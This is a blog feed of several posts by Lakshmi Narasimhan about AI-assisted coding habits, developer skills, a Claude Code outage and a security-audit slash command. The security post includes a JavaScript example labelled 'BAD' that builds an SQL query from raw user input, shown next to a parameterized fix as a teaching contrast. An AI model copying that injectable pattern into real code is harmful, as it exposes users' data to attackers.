But the ability to say “JWT with these exact claims, refresh rotation with this lifecycle, stored in httpOnly cookies” and get exactly that. First try. No guessing. No rebuilding.

The Bottom Line

If you’re building serious software—production SaaS, client projects, anything you’ll maintain beyond next week—you need to understand what you’re building.

Autonomous tools that guess at your architecture don’t save time if you spend days fixing wrong assumptions.

Code you don’t understand becomes a liability the moment something breaks.

Decisions you never made can’t evolve with your requirements.

Control isn’t about micromanaging the AI. It’s about owning the architecture of software you’re responsible for maintaining.

The demos are impressive. The marketing is seductive. The promise of “just describe it” is tempting—and genuinely useful for the right contexts.

But for production software with real requirements, real constraints, and real consequences? Interactive tools that let you specify precisely what you need will outperform autonomous guesswork every time.

Be skeptical of demos. Demand control. Ship code you understand.

]]>

The Junior Dev Paradox: We’re Speed-Running Past the Tutorial

Lakshmi Narasimhan — Sat, 01 Nov 2025 00:00:00 +0000

So here’s a fun thought experiment: What happens when an entire generation of developers learns to code by never actually learning to code?

I don’t mean that in the gatekeepy “back in my day we walked uphill both ways in assembly language” sense. I mean it literally. Right now, today, someone is getting their first junior dev job having built an impressive portfolio of projects they couldn’t debug if their life depended on it.

And honestly? I’m not sure if that’s a problem or just… different.

The Thing Nobody Wants to Say Out Loud

We—the developers who learned pre-AI—spent an ungodly amount of time doing things that, in retrospect, might have been pointless. Memorizing syntax. Reading documentation cover to cover because Stack Overflow didn’t have the answer. Spending three hours debugging only to find a missing semicolon. Writing the same boilerplate for the thousandth time because that’s just how you learned patterns.

That grind built something, though. Call it intuition. Call it muscle memory. Call it the ability to look at a stack trace and justknow where the problem is because you’ve seen that exact error forty times before. We developed pattern recognition through sheer repetitive exposure, like some kind of coding Stockholm syndrome.

Junior devs today can skip all of that. They can describe what they want and watch Claude or Copilot generate it. They can ship features on day one that would’ve taken us weeks to build as juniors. They can contribute to complex codebases without understanding half of what’s happening under the hood.

Which is either the most amazing democratization of technical skills in history, or we’re a generation of developers who are one AI outage away from complete helplessness.

Probably both.

What We Might Be Losing

Here’s what I wonder about:

Can you develop debugging intuition if AI catches most of your bugs?

Can you build system design sense if you’ve never had to architect something from scratch?

Can you really understandwhy something works if you’ve only ever describedwhat you want it to do?

The old way of learning had a built-in forcing function. Youhad to understand data structures because you couldn’t implement anything without them. Youhad to read error messages carefully because that was your only clue. Youhad to develop mental models of how systems work because there was no AI to abstract it away.

It was inefficient as hell. It was also weirdly effective.

Now we’ve got junior devs who can ship impressive features but might struggle to explain what a hash table is or why their O(n^2) solution is melting production. They know how to make things work; they just don’t always knowwhy they work orhow to fix them when they don’t.

And before someone shows up in the comments with “well actually, they can just ask AI to debug it”—sure, until they can’t. Until the AI doesn’t understand the problem. Until the codebase is too complex or too weird or too legacy. Until, I don’t know,Claude Code goes down for five hours and suddenly you’re naked without your safety net.

What We Might Be Gaining

But here’s the flip side: maybe we’re romanticizing the struggle.

Junior devs today are learning different skills. They’re getting good at prompt engineering, at articulating problems clearly, at evaluating AI-generated solutions. They’re exposed to more patterns, more codebases, more architectural approaches in their first year than we saw in five.

They’re also spending less time on tedious nonsense. Nobody needs to memorize the exact syntax for array methods or spend a week setting up a development environment. That time gets redirected to actually building things, to experimenting, to shipping.

And maybe—maybe—the fundamentals that matter are changing. Maybe understanding how to architect a system is more valuable than knowing how to implement every piece of it. Maybe code review skills and the ability to verify solutions matter more than the ability to generate them from scratch.

Maybe the fact that they can be productive on day one is a feature, not a bug.

The Real Problem: The Copy-Paste Generation

The actual risk isn’t that junior devs are using AI. It’s that some of them are using it as a crutch instead of a catalyst.

There’s a difference between “I don’t understand this, let me ask AI to explain it” and “I don’t understand this, so I’ll just copy-paste whatever AI gives me and hope it works.” One is learning accelerated by AI. The other is… well, it’s not learning at all.

We’re going to end up with a split: junior devs who use AI to move faster while still building understanding, and junior devs who are entirely dependent on AI to function. Thefirst group will be terrifyingly productive. The second group is going to hit a wall the moment they encounter a problem AI can’t solve.

And here’s the uncomfortable part: it’s getting harder to tell them apart during hiring. Both can build impressive portfolios. Both can ship features. The difference only shows up when things break, when requirements get weird, when they need to dig into a gnarly legacy codebase that AI doesn’t understand.

Some Half-Baked Solutions

So what do we do about this? I don’t have perfect answers, but here are some thoughts:

For junior devs: Choose the harder path sometimes. Deliberately code without AI for practice. Build a project from scratch where you have to figure everything out manually. Read source code, not just documentation. When AI generates something, understandwhy it works before moving on. Treat AI as a tutor who’s always available, not a replacement for thinking.

For seniors and mentors: Stop assuming junior devs have the same foundation you did. Be explicit about the “why” behind decisions. Create space for questions that might sound basic. Do code reviews that focus on understanding, not just functionality. Maybe assign “AI-free” tasks occasionally, not as hazing, but as skill-building.

For companies: Normalize “I don’t know, let me learn this properly” instead of “ship at all costs.” Allocate time for learning, not just velocity. Celebrate understanding, not just output. Maybe reconsider how you evaluate technical skills in interviews—you’re not just testing if someone can code, you’re testing if they can think.

For education: Stop pretending AI doesn’t exist. Teach people how to use it effectively, not how to avoid it. But also teach debugging, system design, and foundational concepts. The goal isn’t to reject AI; it’s to use it wisely while building real understanding.

The Uncomfortable Non-Conclusion

Here’s the truth: We’re all figuring this out in real-time. Every generation of developers has had this conversation in some form—about IDEs, about Stack Overflow, about frameworks that abstract away complexity. The old guard always worries the new guard doesn’t know “the fundamentals.”

Sometimes they’re right. Sometimes they’re just old. Also, “the fundamentals” is an ever shifting goal post.

I don’t know which this is yet. Ask me in five years when we see how this generation of AI-native developers performs at scale. Ask me when we see if they hit a ceiling or if they just built their skills differently.

What I do know is this: AI-assisted coding isn’t going away. The barrier to building software has collapsed. Junior devs can be productive faster than ever. And somewhere in there, we need to figure out how to preserve the understanding that makes you not just productive, but genuinely good at this job.

Because the best developers aren’t the ones who can generate code the fastest. They’re the ones who can look at a complex system, understand how it works, figure out why it’s broken, and know how to fix it. Whether you learned that through years of painful debugging or through AI-accelerated practice doesn’t really matter.

As long as you actually learned it.

]]>

When Claude Code Goes Down: A Meditation on Modern Dependency

Lakshmi Narasimhan — Fri, 31 Oct 2025 00:00:00 +0000

Let me paint you a picture. It’s this evening. I’m in the zone. Fingers flying across the keyboard, that beautiful flow state where you and your AI coding assistant are one harmonious bug-squashing machine. And then, without warning, without so much as a courtesy error message, Claude Code just… dies.

Not the graceful kind of death where systems send you helpful notifications. Well, okay, they had a status page. There wastechnically a “we’re experiencing technical difficulties” message somewhere on the internet if you went looking for it. But in the moment? When you’re mid-keystroke and suddenly your AI copilot just stops responding? It just felt gone. Vanished. Disappeared like my motivation to manually write boilerplate code.

For approximately thirty seconds, I experienced what I can only describe as the five stages of grief compressed into real-time panic. Denial: “It’s just my internet.” Anger: “ARE YOU KIDDING ME RIGHT NOW?” Bargaining: “Maybe if I restart everything seventeen times…” Depression: “I guess I’m just not deploying tonight.” And finally, acceptance: “Well, I suppose I could try coding like it’s 2019.”

The outage lasted about five hours. Five. Entire. Hours. In developer time, that’s basically a geological epoch. I had bugs to fix. Tests to run. Production deployments waiting. And here I was, suddenly expected to do all of this using only my own fragile, fallible human brain.

So I did what any reasonable developer would do: I panicked for another minute, then reluctantly dusted off those ancient skills we used to call “programming without an AI safety net.”

Here’s the uncomfortable truth nobody wants to admit: it wasn’tthat bad. I mean, it was bad. Don’t get me wrong. It was slow and tedious and made me feel like I was debugging with mittens on. But I didn’t spontaneously combust. My IDE still worked. My fingers still remembered where the keys were. Muscle memory is apparently still a thing.

I fixed the bug. Eventually. It just took approximately three times longer than it should have because I had to do wild, archaic things like “read the documentation thoroughly” and “actually understand what my code was doing” instead of asking Claude Code to explain it to me like I’m five.

The testing phase was particularly brutal. Normally, I’d have Claude Code help me think through edge cases, generate test scenarios, and spot the stupid mistakes I’m invariably making. Instead, I had to use my own brain to think of test cases. Myown brain! Like some kind of caveman! I had to actually remember what good test coverage looks like and implement it myself. The horror.

And deployment? Well, deployment was already sorted, thankfully. But the whole process of getting there—fixing the bug, testing it properly, making sure everything was ready to ship—felt like wading through molasses. Without my AI copilot catching my typos, suggesting optimizations, and helping me think through edge cases, every step just took longer than it should have.

But here’s where it gets really pathetic. After about two hours of this manual labor cosplay, I had a brilliant idea. Claude Code might be down, but wasn’t there Claude Codeweb? Like, the browser version? Different infrastructure, right? Surely that was still running?

So I did what any self-respecting, definitely-not-addicted developer would do: I pulled my entire git repo into Claude Code web and just… kept working there. Yes, you read that right. My solution to Claude Code being down was to use a different version of Claude Code. I replaced my broken AI dependency with a slightly different flavour of the exact same AI dependency.

The technical term for this is “problem-solving.” The accurate term for this is “I have a problem.”

It actually worked pretty well as an interim hack, which is either a testament to Anthropic’s redundancy planning or a damning indictment of my ability to function independently. Probably both. The web version was a bit clunkier for my workflow, sure, but it beat slowly dying inside while manually parsing error messages.

The whole experience gave me a weird kind of perspective. It’s like when your phone dies and you suddenly remember you have hands and can look at things in real life. Except instead of appreciating nature, I was appreciating how much faster AI makes me at my job.

I can technically code without Claude Code. I proved that tonight. It’s like how I can technically do math without a calculator—possible, legal, but why would I choose suffering? The old ways still work. They’re just… inefficient. Tedious. The kind of thing that makes you question your career choices around the third hour of manually debugging something that Claude Code would’ve spotted in thirty seconds.

But sitting there in the dark ages of 2019-style development, something struck me. It’s been barely any time at all since AI coding assistants became genuinely useful. A few years ago, we were all coding exactly like this—manually, slowly, relying entirely on our own pattern recognition and Stack Overflow. And we thought we were pretty damn efficient.

Now? Now a five-hour outage feels like a crisis. That’s how far we’ve come. That’s how quickly this technology went from “neat party trick” to “fundamental part of my workflow” to “how did I ever function without this.”

I spent those five hours slightly inconvenienced, moving slower than usual, but still shipping code to production. A decade ago, this was just called “having a normal day at work.” Today, it felt like working with a handicap. That shift happened so fast we barely noticed it occurring.

We’re living through one of those rare moments where technology isn’t just improving incrementally—it’s fundamentally changing how we work. And tonight, in the brief absence of that technology, I got a glimpse of both where we’ve been and how far we’ve traveled.

The tools came back online. I went back to my normal pace. But I won’t forget that brief window of forced perspective, that reminder that we’re experiencing something genuinely transformative in real-time. Even if it did feel painfully slow while it was happening.

]]>

How to Secure Your Vibe-Coded Project (Before It Secures You)

Lakshmi Narasimhan — Thu, 30 Oct 2025 00:00:00 +0000

Most developers ship AI-generated code without security audits. Here’s how to catch vulnerabilities before they become breaches—without hiring a security team.

You’re moving fast. AI is writing code. You’re shipping features daily. But speed creates blind spots—and security vulnerabilities love blind spots.

I’ve watched developers ship vibe-coded projects thatworked but had SQL injection holes, exposed API keys, and broken authentication. Not because they were careless—because they were solo and didn’t have time to review every line AI generated.

Here’s the truth: you can’t manually audit everything. But you can automate the audit.

Why Incremental Reviews Aren’t Enough

Tools like/security-review catch issues in pull requests. That’s great for new code. But what about legacy code? Configurations that haven’t been touched in months? Dependencies with known CVEs?

Incremental reviews are daily vitamins. Full audits are annual physicals. You need both.

What a Security Audit Should Cover

A comprehensive security audit doesn’t just scan for SQL injection. It evaluates your entire attack surface against industry-standard frameworks:

OWASP Top 10 2021 — Broken access control, cryptographic failures, injection attacks
OWASP API Security Top 10 2023 — Broken object-level authorization, mass assignment, security misconfigurations
Cloud & Infrastructure Security — Misconfigured S3 buckets, exposed environment variables, weak IAM policies
Supply Chain Security — Vulnerable dependencies, outdated packages, insecure third-party integrations

The Four Layers of a Proper Audit

1. Reconnaissance: Understanding Your Stack

Before auditing, the tool needs to know what you’re running: Node.js? Python? Docker? Postgres or MongoDB? Framework: Express, FastAPI, Next.js?

This determines which vulnerability patterns to look for. SQL injection matters in Postgres apps. NoSQL injection matters in MongoDB apps. Different stacks, different attack vectors.

2. Code Analysis: Finding Hidden Vulnerabilities

This is where the audit scans every file—not just recent changes—looking for patterns that indicate security issues:

User input flowing directly into database queries (SQL/NoSQL injection risk)
Hardcoded secrets or credentials in code
Missing authentication checks on sensitive endpoints
Weak cryptography (MD5, SHA1) for passwords or tokens
Overly permissive CORS policies
Exposed debug endpoints in production

javascript

// BAD: SQL injection vulnerabilityapp.get('/user',(req,res)=>{constuserId=req.query.id;db.query(`SELECT * FROM users WHERE id =${userId}`);// Dangerous!});// GOOD: Parameterized queryapp.get('/user',(req,res)=>{constuserId=req.query.id;db.query('SELECT * FROM users WHERE id = ?',[userId]);});

3. Configuration Review: Infrastructure Security

Code vulnerabilities are obvious. Configuration vulnerabilities are subtle:

Are environment variables properly isolated?
Do Docker containers run as root? (They shouldn’t.)
Are cloud storage buckets publicly accessible?
Is TLS enforced on all endpoints?
Are rate limits configured to prevent abuse?

These issues don’t show up in code reviews. They live in config files, environment variables, and infrastructure settings.

4. Dependency Scanning: Supply Chain Vulnerabilities

Your code might be secure, but your dependencies might not be. Audit tools scanpackage.json,requirements.txt, andgo.mod against databases of known CVEs (Common Vulnerabilities and Exposures).

If a package has a critical security flaw, you’ll know—and you’ll get specific remediation guidance (upgrade to version X.Y.Z).

How to Run an Effective Security Audit

If you’re using Claude Code, you can install a/security-audit slash command that automates this entire process. It performs reconnaissance, analyzes every file, reviews configurations, and scans dependencies—generating an actionable report.

The key difference from incremental reviews:it catches everything—even vulnerabilities in code you wrote months ago and haven’t touched since.

Installation

Global installation (available across all projects):

bash

mkdir -p ~/.claude/commandscurl -o ~/.claude/commands/security-audit.md https://example.com/security-audit.md

Project-specific installation (for team collaboration):

bash

mkdir -p .claude/commandscurl -o .claude/commands/security-audit.md https://example.com/security-audit.md

Running the Audit

From Claude Code, type:

bash

/security-audit

The tool will:

Identify your tech stack
Scan every file for vulnerability patterns
Review configurations (Docker, env files, cloud settings)
Check dependencies against CVE databases
Generate a prioritized report with specific remediation steps

When to Audit

Use/security-review during daily development for fast feedback on pull requests.

Use/security-audit monthly or quarterly for comprehensive assessment—especially before major releases or when adding new features that touch sensitive data.

Think of them as complementary: one catches new issues, the other catches everything.

The 20% That Prevents 80% of Breaches

Most security incidents aren’t sophisticated zero-days. They’re basic misconfigurations: exposed API keys, missing authentication, unpatched dependencies.

A security audit catches these low-hanging issues—the 20% of configs that prevent 80% of breaches. You’re not trying to build Fort Knox. You’re trying to avoid being the easy target.

Security is a Discipline, Not a Feature

When you’re running solo, security feels like something you’ll “get to later.” But later turns into never—until something breaks.

Automate the audit. Run it regularly. Fix what it finds.

You don’t need a security team. You need visibility into what’s broken and specific guidance on how to fix it. That’s what a proper security audit provides.

Because the best time to find vulnerabilities is before attackers do.

]]>

10 Ways to Waste Time and Money with AI Agents: A Field Guide to Self-Sabotage

Lakshmi Narasimhan — Wed, 29 Oct 2025 00:00:00 +0000

Money spent is obvious—we burn through tokens like a hedge fund manager through investor capital, exhausting our weekly quotas by Tuesday. Time, however, is subtle and invisible. Something I call the Anti-AI Paradox: that creeping realization that you could have hand-coded the entire feature in half the time it took to “collaborate” with your AI assistant. Let me save you some grief.

1. Being Super Vague

AI models are getting smarter by the day. But they can’t read tea leaves like some digital oracle you summoned from Silicon Valley. “My ‘Schedule’ button isn’t scheduling the post.” Sure, Einstein. I can see that. Revolutionary observation.

Give me more context. What do you see in the logs? What did youexpect to happen? What happened instead? Did it fail silently? Throw an error? Launch the nuclear codes? Eric S. Raymond’s “How to Ask Questions The Smart Way” is still devastatingly relevant after all these years, but apparently nobody got the memo.

The AI isn’t a mind reader—it’s a very expensive pattern matcher. Treat it accordingly.

2. Vibe Coding in the Truest Spirit

I’m going to hit “Accept” until my fingers are sore or the code does what I want. Whichever comes first. It’s like Russian roulette, but with merge conflicts.

No. Take a step back.Talk with your tool about what needs to be implemented and what the approach should be. It is imperative—not optional, not nice-to-have—that you understand it. Ask questions until you do. Don’t allow a single line of code to be written without you knowing the consequences.

Don’t pay the ignorance tax. The interest rates are criminal.

3. Don’t Read the Code Written by AI

Again, just hit “Accept” and pray to whatever deity oversees production deployments. Why read? Why think? Why have standards?

You need to know the consequences. How this piece affects other parts of your codebase. How the addition of a new feature might possibly break something else that’s been working fine for three months. I feel even AIs aren’t good enough at this second-order thinking. So many “You’re absolutely right!” responses to things that wereobvious in hindsight but the AI somehow missed.This Reddit thread is in equal parts hilarious and terrifying.

Code review exists for a reason. Even if the author is artificial.

4. Do Multiple Changes in One Session

This is a surefire way to confuse the heck out of the AI, and eventually yourself. Congratulations, you’ve achieved parity—you’re both lost.

Have one Claude/Cursor session for one unit of work. It can be a simple fix for a broken sidebar. Or preparation for something monumental, like refactoring all functions to use JWT. How do you figure out the right unit of work? Depends on context. (Your mileage may vary, batteries not included, void where prohibited.) There aretools to divide your “build me an image editing tool” prompt into proper AI and human digestible units of work.

In the JWT example, maybe all the functions are in the auth module only. Not a lot of context switching—for both carbon and silicon-based lifeforms. Even if it breaks, you can purge that commit off the face of the earth, go back to the drawing board, recoup, rethink, and re-execute.

But what if you club both examples in the same session? A broken sidebar comes across as a seemingly harmless fix, only to discover that the “fix” isn’t responsive, and now you need to add a new library, a consequence of which is thatnpm run build fails spectacularly. You debug this rabbit hole for an hour. Your context window explodes like a supernova. You didn’t fix the sidebar. Two hours and eight dollars in credits flew by. (Just sayin’.)

Which brings us to…

5. Choke the Context Window

We need to be strategic with our prompts and questions. They need surgical precision, not the intellectual equivalent of a shotgun blast.

When you say “the register endpoint in @app.py returns 500 if the email already exists, but @utils.py already has a check for that,” you’re sending the entire 1,000-line app.py file and the 1,500-line utils.py file into your precious context window. Congratulations, you just spent $2 to ask a $0.50 question.

Even better: when you coded app.py and utils.py in the first place, don’t make them 5,000 lines long. Even if the AIwants to take any of these files into context, it will result in context hemorrhage sooner or later. Give clear instructions to the AI not to make your files and modules like Homer’s Iliad. Nobody wants to read that much Python in one sitting.

If your codebase was written by humans (remember those?), create units of work to refactor these monstrosities. Your future self will thank you profusely. The AI even more.

6. Don’t Use Parallel Sessions

When you’re building a feature—say, WebSocket integration—and have another in the pipeline, you fire up your IDE, give clear instructions, rightsized units of work, and then… you twiddle your thumbs while the AI finishes, right? Making coffee? Checking Twitter? Contemplating the heat death of the universe?

Have you considered using git worktrees and parallel sessions so that they can execute independently of each other? Later, you can merge both feature branches into the parent branch. Revolutionary concept, I know.

Here’s another kicker: you can orchestrate an AI agent to do this entire thing for you—split into parallel units of work, create git worktrees, orchestrate parallel sessions, review and merge back the code, clean up. It isn’t a stretch to say we’re hitting technological singularity. The robots are already doing the DevOps we were too lazy to automate properly.

I wrote a piece related to this:

7. MCP Overuse

MCPs (Model Context Protocol servers) consume tokens. Alot of them. They’re the SUVs of the API world—powerful, useful, and absolute gas guzzlers.

Use prudence and exercise your own judgment here. For example, to scaffold a GitHub repo with a FastAPI boilerplate, the GitHub MCP is the slowest and costliest way. You’re better off using thegh CLI. Or, you know, copying a template. Revolutionary, I know.

Not all MCP use is stupid. But some of it isreally stupid.

8. MCP Underuse

Context7 MCP is used by your AI to refer to up-to-date documentation for the libraries and APIs you use. Use the GitHub or JIRA MCP to update the task you’ve been working on. The utility value of MCPs is staggering.

If you’re not using MCPs where they make sense, you’re simply leaving time and money on the table. It’s like having a Swiss Army knife and only using the bottle opener. Sure, it works, but you’re missing out.

9. Don’t Write Tests

Did you finish a unit of work? Did you forget to write tests for that? Superb! Because this is going to come back and haunt you after weeks—possibly months—when you’re shipping something else on a tight deadline, and this thing you wrote many lifetimes ago is suddenly, inexplicably broken.

Every unit of work that goes in as a git commit must be tested. At least manually. Preferably with actual test cases that run in CI/CD and don’t just live in your head as “yeah, I’m pretty sure this works.”

Future you is going to hunt down present you with a very particular set of grievances. Don’t give them ammunition.

Again, a related post:

10. Don’t Update Your Project’s Context

Something AIs and humans have in common: context is everything. And both forget it constantly.

Picture this: you’re three months into a project. You open a file. “Wait, the architecture document says we use Redis to store the messages. But here we are using ZeroMQ. Let me do a git blame.”

Ah. You did it three weeks back. Right before going on vacation. The context that seemedso obvious at the time has evaporated like morning dew. You’re now an archaeologist excavating your own code, trying to understand why Past You made these decisions.

Update your project’s context. Maintain a living document—a README, an architecture decision record, inline comments that aren’t just “// fix later” (spoiler: you won’t). Explainwhy you made certain choices. Your AI needs this context to give you useful suggestions. Your human collaborators need it to not send you passive-aggressive Slack messages. Your future self needs it to avoid existential crises at 2 AM.

“We switched from Redis to ZeroMQ because the message ordering guarantees were critical for the event sourcing pattern we implemented in sprint 12.” There. Was that so hard? Now everyone—human and AI alike—can work with the actual state of the world instead of a beautiful fiction from three months ago.

The Bottom Line

AI coding assistants are powerful tools. Emphasis ontools. They’re not magic. They won’t read your mind, fix your architecture problems, or absolve you of the responsibility to understand your own codebase.

Use them strategically. Be precise. Maintain context. Write tests. Don’t let the robots drive—you’re still the one who has to explain to your manager why the production database got dropped.

And for the love of all that is holy, read the code before you merge it.

Your token budget will thank you. Your future self will thank you. And your AI assistant will stop generating those “You’re absolutely right!” responses that make you question everything.

]]>

The Indie Dev Edge in the Age of AI

Lakshmi Narasimhan — Mon, 27 Oct 2025 00:00:00 +0000

Everyone and their dog’s obsessed with writing code faster.

AI makes us 10x writers. 100x typists. Whatever.

But nobody’s talking about becoming a 10xreader.

And here’s the kicker — AI is vomiting out more code than ever. Which meansyou need to read and understand more code than ever. The bottleneck isn’t writing anymore. It’s comprehension, judgment, and knowing when to hit delete instead of commit.

Why this Matters More Now

The AI paradox

Claude can churn out 500 lines of backend logic in 30 seconds. Butyou still have to:

Check if it actually does what you asked
Notice the subtle bug hiding in error handling
Decide whether that abstraction will come back to bite you
Understand it well enough to fix it when the PM changes the requirements tomorrow

AI can write all the code in the world. It still can’t tell you if it’sgood.

The reality

Juniors with AI now ship code at senior speed. The problem? They can’t tell good generated code from hot garbage. They move fast, break things… and then ask you to review it.

The unlock

Seniors with reading chops use AI without becoming its pet. They skim generated code like Neo reading the Matrix — “yeah, that’s an off-by-one bug right there.” Reading is the gate. Writing is just the noise.

The Code Reading Muscle

It’s not “reading comprehension.” It’s mental pattern recognition with caffeine.

Pattern recognition — You seeif err != nil { return nil, err } and your brain whispers, “Go boilerplate, nothing to see here.”

Architecture intuition — You open a repo and know where the dead bodies are buried just from the folder structure.

Bug radar — That spidey-sense that tingles before you even scroll — something’s off. Usually missing validation, or someone “cleverly” sharing a global.

Context switching speed — You can hop from React component → API → database query → back again without losing the plot.

Abstraction unpacking — You seeuserService.authenticate() and immediately imagine the 12 files hiding behind that call.

That’s the muscle. Reading is pattern spotting at light speed.

Exercises That Actually Work

1. The 5-Minute Codebase Scan

Pick a random GitHub repo. Small, readable.

Set a 5-minute timer. Try to answer:

What does it do?
What’s the core abstraction?
Where would you add a new feature?
What’s the sketchiest piece of code?

You’ll probably be wrong the first few times. Perfect. You’re training intuition, not memorizing trivia.

Start with stacks you know. Then branch out. Eventually, try reading something alien — that’s where growth hides.

2. AI Code Review Roulette

Ask Claude or ChatGPT to write something — a rate limiter, a REST API, a React hook.

Now,don’t run it.

Read it like a detective:

What could break?
What smells?
What would you refactor?

Then run it and see how wrong (or right) you were.

Do this enough and you’ll develop a sixth sense for AI bugs — the kind that crash in production at 3 a.m.

Bonus: Ask two AIs the same thing. Which one’s code would you rather maintain? Why? That’s your taste muscle forming.

3. The Changelog Detective

Pick a library you use every day. Go to its GitHub releases. Read the commit diffs for a minor or patch bump.

Ask:

Why was this changed?
What broke?
What tradeoff did the maintainer choose?

You’ll start seeing the real engineering behind the facade. That’s where mastery lives.

4. Explain It to a Duck

Grab a gnarly function.

Now, explain it in plain English. No jargon.

If you can’t? You don’t actually understand it. Keep at it.

Bad: “It maps and filters the array.”

Good: “It finds active users in the last 30 days, sorted by login time.”

That’s real understanding. Not just parroting syntax.

5. The “No Running” Challenge

Write a small program. 50–100 lines. Don’t run it.

Read it twice and predict:

What will the output be?
Where will it break?
What edge case will it choke on?

Then run it. Reality check time.

This builds your internal compiler — the one that helps you debug production when the system’s on fire and kubectl exec isn’t helping.

How This Compounds Over Time

0–2 years:

You read slow. You write slow. You Google “Python for loop syntax” a lot.

AI enters:

Suddenly you writefast. But you still read like a confused tourist. You ship more bugs, faster.

2–5 years:

Now you read fastand write fast. You glance at AI output and see through it.

5+ years:

You can parachute into any repo and get the lay of the land in minutes. You’re debugging across services. Reading is 80% of your job. Writing is an afterthought.

Every project you touch sharpens the radar. Every bug you fix improves your mental models. Every codebase you inherit becomes easier to digest. That’s compounding.

Also: boring stacks help.

You read the same patterns — Postgres, Redis, Express — again and again until it’s second nature. No cognitive tax. Fancy tech makes you start from zero every time.

Daily Practice (a.k.a. the Boring Way That Works)

Morning ritual: Read one function before writing a line. Two minutes. That’s it.
PR reviews: Don’t just skim — askwhy the author made those choices.
AI pair programming: Never accept AI code blindly. Read before you run. Especially when you’re in a rush.
Weekend deep dives: Pick one OSS project a month and read the core 200 lines.
Bug postmortems: After fixing something, read the surrounding code. Figure outwhy it broke in the first place.

That’s how you actually build the muscle. Quietly. Daily.

Don’t Fake It

Speed reading code to “feel productive” is fake progress.

If you can’t explain it, you don’t understand it.

Red flags:

Approving PRs faster than Slack loads
Forgetting what your own code does after a week
Acting surprised when it breaks exactly how it looks like it would

Slow down. Read with intent. Comprehension beats velocity every single time.

The Meta-Skill

AI will keep getting better at writing code. It’ll never understandwhy the code matters.

That’s your job.

The developer who canread code — fast, deeply, intuitively — will always win.

Start building the muscle. It ages like wine.

Do this today:

Pick one exercise. Do it now. Time yourself. Do it again next week. You’ll notice you’re faster — not at typing, but atthinking.

That’s the real 10x skill nobody’s bragging about on LinkedIn.

]]>

You should probably ditch your IDE

Lakshmi Narasimhan — Sun, 26 Oct 2025 00:00:00 +0000

I fire up VS Code.

It opens the last workspace I was in — half a dozen tabs, a Dockerfile, maybe a README from some unrelated task.

No clue what I was working on.

Just a vague memory: “Something about the scheduling API… or maybe a bug?”

I sit there for a moment trying to reconstruct context.

Last commit was Friday.

Today’s Tuesday.

My brain’s context window has been wiped clean by Slack pings, meetings, and weekend errands.

Command-P.

Type a filename I half remember.

Oh right, that test file.

Wait — did I change this in another branch?

Let me check.

Open terminal.

git branch.

Switch.

Pull.

Oops, the local container setup broke.

Right, I had containerized everything.

So now I need to run docker compose up. But then I remember there’s a VS Code extension that does it automatically. Let me find it, install it, configure it, restart VS Code.

Fifteen minutes gone.

I still haven’t written a single line of code.

This is what IDEs do to us.

Theyfeel fast, but they slow us down in invisible ways.

Every step is a click, a context switch, a small distraction.

Every plugin promises convenience, but adds one more thing to babysit.

IDEs are built for humans — for our limited memory and need for visual cues.

They make us feel productive, but under the hood they’re optimizing for comfort, not speed.

Now we’re trying to stuff AI into them — Copilots, side panels, chat panes —

as if AI needs dark themes and split editors to work.

It doesn’t.

AI just needs a clean interface:

a project tree, access to code, a goal.

And that’s why the recent trend is fascinating —

AI tools are slowlyreleasingCLI equivalents.

Why? Because CLIs are where real automation lives.

They don’t need to simulate human clicks.

They justdo things.

Look atClaude Code.

It’s keyboard-first, agentic, workflow-oriented.

No panels, no mouse clicks.

Just you, the terminal, and an AI that can actuallyact.

We’re entering an era where your local environment looks less like VS Code

and more like a command center —

a space where you orchestrate AI agents that code, build, test, and deploy.

You’re still in control, but your role shifts.

From “person typing in an editor”

to “team lead directing a swarm of coding agents.”

Don’t get me wrong — IDEs aren’t evil. They’re amazing tools for focus and flow. But if you care about speed, reproducibility, and automation…

you’ll outgrow them.

Because when AI can understand your repo, navigate branches, run builds, and test code —

why would you confine it inside a tool built for human eyes and hands?

IDEs are optimized for humans, they’ve been around for decades. Suddenly we’re trying to retrofit AI coding agents inside IDEs or forking IDEs to have AI coding assistants as first class citizens, and it is severely limiting.

We’re heading somewhere new.

And the first step might just be typing “claude” instead of opening VS Code.

]]>

Be prepared to throw away your code

Lakshmi Narasimhan — Mon, 20 Oct 2025 00:00:00 +0000

I used to think good code was code that lasted forever.

Elegant abstractions. Perfect separation of concerns. The kind of architecture that would make senior engineers nod approvingly during code reviews I’d never actually have.

So I’d spend hours future-proofing everything.

Designing plugin systems for features that didn’t exist yet. Building configuration layers for options nobody asked for. Creating abstractions so flexible they could handle anything — except the one thing I actually needed to ship.

Then one day, I had to rip out an entire auth system I’d spent two weeks perfecting.

Not because it was broken. Because the product changed direction and suddenly we needed OAuth instead of email/password.

All those beautiful interfaces, those carefully crafted base classes, those thoughtful error hierarchies — deleted in an afternoon.

And you know what hurt most? It wasn’t the wasted time.

It was howhard it was to delete.

The auth logic had tendrils everywhere. Every controller imported it. Every model referenced it. Every test depended on it. Removing it felt like performing surgery on a patient who was still awake.

That’s when I learned the most important lesson about indie dev architecture:

The best code isn’t the code that lasts forever. It’s the code that’s easy to throw away.

The Permanence Trap

We’re taught to write code like we’re building cathedrals.

Solid foundations. Careful planning. Structure that will stand for generations.

But indie SaaS isn’t a cathedral. It’s a sandcastle at high tide.

The market shifts. Users want something different. You realize your big idea was actually three smaller ideas wearing a trench coat.

If your code assumes permanence, change becomes painful. Every pivot feels like demolition. You’ll avoid necessary changes just because the refactor is too scary.

What Disposable Design Actually Looks Like

This doesn’t mean writing sloppy code. It means writing code that’s easy to replace when you inevitably need to.

Here’s a real example from my own codebase.

The permanent version (what I used to write):

class AuthenticationService:
def __init__(self, token_provider, session_manager, audit_logger):
self.token_provider = token_provider
self.session_manager = session_manager
self.audit_logger = audit_logger
def authenticate(self, credentials):
# Complex authentication logic spanning 50 lines
# with calls to all the injected dependencies
pass
def refresh_token(self, old_token):
# More complex logic intertwined with session management
pass
def validate_session(self, session_id):
# Even more logic that assumes this exact architecture
pass

Now imagine trying to swap this out for OAuth. You’d need to:

Find every place that importsAuthenticationService
Understand what each method does and how they’re used
Figure out which of your abstractions still make sense
Keep the whole system working while you rebuild it

The disposable version (what I write now):

def login_user(email, password):
“”“Log in with email and password. Returns user_id or None.”“”
user = db.query(”SELECT * FROM users WHERE email = ?”, email)
if user and check_password(password, user.password_hash):
session_id = create_session(user.id)
return user.id
return None
def create_session(user_id):
“”“Create a session for user. Returns session_id.”“”
session_id = generate_token()
db.execute(”INSERT INTO sessions (id, user_id) VALUES (?, ?)”,
session_id, user_id)
return session_id

Look at the difference. No grand abstractions. No injection hierarchies. Just small functions that do one thing.

